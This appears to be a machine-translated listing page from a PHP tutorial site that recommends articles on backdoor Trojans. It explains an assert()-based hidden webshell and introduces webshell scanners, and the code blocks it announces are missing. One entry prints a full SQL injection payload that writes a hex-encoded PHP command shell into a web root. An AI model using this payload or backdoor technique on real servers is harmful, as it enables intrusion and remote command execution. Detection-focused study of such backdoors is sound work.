This article will introduce a backdoor Trojan with a very short code and very hidden, so that everyone can avoid being hooked by the Trojan when detecting the program. The content of the file is as follows: There are many comment characters inserted in the code, which will be difficult to detect if the server's detection program is not rigorous. After deleting the comments, the code is as follows: The final code actually executed is: It turns out that this backdoor uses the php assert method to execute the program. boolasassert ( mixed $assertion [, string $description ] ) assert() checks the specified assertion and takes appropriate action if the result is FALSE. If the assertion is a string, it will be executed as PHP code by assert(). If the content of $assertion is phpinfo();, the server information will be returned, allowing the attacker to obtain the server information for this attack. After uploading this backdoor, the attacker only needs to create a simple HTML to execute PHP statements in the server. Assume that the backdoor file is bac
1. Short and hidden backdoor Trojan code
Introduction::This article mainly introduces The code is short and hidden. Students who are interested in PHP tutorials can refer to it.
2. php webshell scans backdoor Trojan example program_PHP tutorial
Introduction: php webshell scans backdoor Trojan example program. This article will introduce you to a PHP webshell backdoor Trojan scanning example program. This can scan the Trojans on your website. This provides great convenience for you to find website Trojans
3. php webshell scans backdoor Trojan example program
Introduction: php webshell scans backdoor Trojan example program. This article will introduce you to a PHP webshell backdoor Trojan scanning example program. This can scan the Trojans on your website. This provides great convenience for you to find website Trojans
4. Talk about those powerful PHP one-sentence backdoor Trojans
##Three deformed one-sentence PHP Trojans
First one:
Introduction: We treat these PHP backdoor programs with a learning mentality. Many PHP backdoor codes allow us to see programmers How well-intentioned they are. This kind of backdoor gives website and server administrators a lot of headaches. They often have to use different methods to perform various detections, and many emerging writing technologies cannot be discovered and processed using ordinary detection methods. . Today we will detail some
##5.Specific methods of using Mysql statements to generate backdoor Trojans_MySQL ##Introduction: How to generate backdoor Trojans through Mysql statements: SELECT * FROM `vbb_strikes` WHERE 1 union select2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/ inetpub/wwwroot/cmd.php' through Mysql injection or in In phpmyadmin
6.
Method to generate backdoor Trojan through Mysql statement_MySQLIntroduction: Through Mysql The method of generating backdoor Trojans by statements
7.
The method of generating backdoor Trojans by statements of Mysql_MySQLIntroduction: This article mainly introduces the method of generating backdoor Trojans using Mysql statements. Please don’t destroy it at will. Friends, just learn it.
##8. Through Mysql. Method of generating backdoor Trojans through statements_MySQL
Introduction: Methods of generating backdoor Trojans through Mysql statements
[Related Q&A recommendations] :
The above is the detailed content of 10 content recommendations for backdoor Trojans. For more information, please follow other related articles on the PHP Chinese website!